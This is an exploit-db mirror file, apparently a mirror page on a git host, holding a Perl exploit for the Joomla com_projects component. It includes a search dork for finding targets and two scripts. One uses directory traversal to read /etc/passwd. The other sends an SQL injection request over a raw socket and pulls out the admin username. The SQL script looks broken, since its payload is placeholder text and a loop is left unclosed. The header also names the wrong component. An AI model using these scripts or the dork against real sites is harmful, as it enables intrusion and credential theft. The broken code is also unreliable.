bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/34934.pl
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

139 lines
No EOL
5.1 KiB
Perl
Executable file
Raw Blame History

source: https://www.securityfocus.com/bid/44456/info
The 'com_projects' component for Joomla! is prone to an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. By using directory-traversal strings to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks.
=========================================================
Joomla Component com_projects LFI & SQL Vulnerability
=========================================================
[+]Title : Joomla Component com_calendrier RFI Vulnerability
[+]Author : jos_ali_joe
[+]Contact : josalijoe@yahoo.com
[+]Home : http://josalijoe.wordpress.com/
########################################################################
Dork : inurl:index.php?option="com_projects"
########################################################################
[ Software Information ]
########################################################################
[+] Vendor : http://www.codegravity.com/
[+] Download : http://www.joomla.org/download.html
[+] version : Joomla 1.5
[+] Vulnerability : LFI and SQL Vulnerability
[+] Dork : com_projects
########################################################################
[+] Exploit: LFI
====================================================================================
http://localhost/index.php?option=com_projects&controller=[ LFI ]
====================================================================================
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
print "\t\t########################################################\n\n";
print "\t\t# Joomla Component com_projects LFI Vulnerability #\n\n";
print "\t\t# by jos_ali_joe #\n\n";
print "\t\t########################################################\n\n";
if (!$ARGV[0])
{
print "Usage: perl idc.pl [HOST]\n";
print "Example: perl idc.pl http://localhost/LFI/\n";;
}
else
{
$web=$ARGV[0];
chomp $web;
$iny="agregar_info.php?tabla=../../../../../../../../../../../../../../../../etc/passwd%00";
my $web1=$web.$iny;
print "$web1\n\n";
my $ua = LWP::UserAgent->new;
my $req=HTTP::Request->new(GET=>$web1);
$doc = $ua->request($req)->as_string;
if ($doc=~ /^root/moxis ){
print "Web is vuln\n";
}
else
{
print "Web is not vuln\n";
}
}
####################################################################################
[+] Exploit: SQL
====================================================================================
http://localhost/index.php?option=com_projects&view=project&id=[ SQL ]
====================================================================================
use IO::Socket;
if(@ARGV < 1){
print "
[========================================================================
[// Joomla Component com_projects SQL Injection Exploit
[// Usage: idc.pl [target]
[// Example: idc.pl localhost.com
[// Vuln&Exp : jos_ali_joe
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/index.php?option=com_projects&view=project&id=";
print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}
$target = "SQL Injection Exploit";
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: * /*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /username:(.*?)pass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}
####################################################################################
Thanks :
./kaMtiEz ? ibl13Z ? Xrobot ? tukulesto ? R3m1ck ? jundab - asickboys- Vyc0d ? Yur4kha - XPanda - eL Farhatz
./ArRay ? akatsuchi ? K4pt3N ? Gameover ? antitos ? yuki ? pokeng ? ffadill - Alecs - v3n0m - RJ45
./Kiddies ? pL4nkt0n ? chaer newbie ? andriecom ? Abu_adam ? Petimati - hakz ? Virgi ? Anharku - a17z a.k.a maho
./Me Family ATeN4 :
./N4ck0 - Aury - TeRRenJr - Rafael - aphe-aphe
Greets For :
./Devilzc0de crew ? Kebumen Cyber ? Explore Crew ? Indonesian Hacker - Byroe Net - Yogyacarderlink - Hacker Newbie - Jatim Crew - Malang Cyber
My Team : ./Indonesian Coder
Reference in a new issue View git blame Copy permalink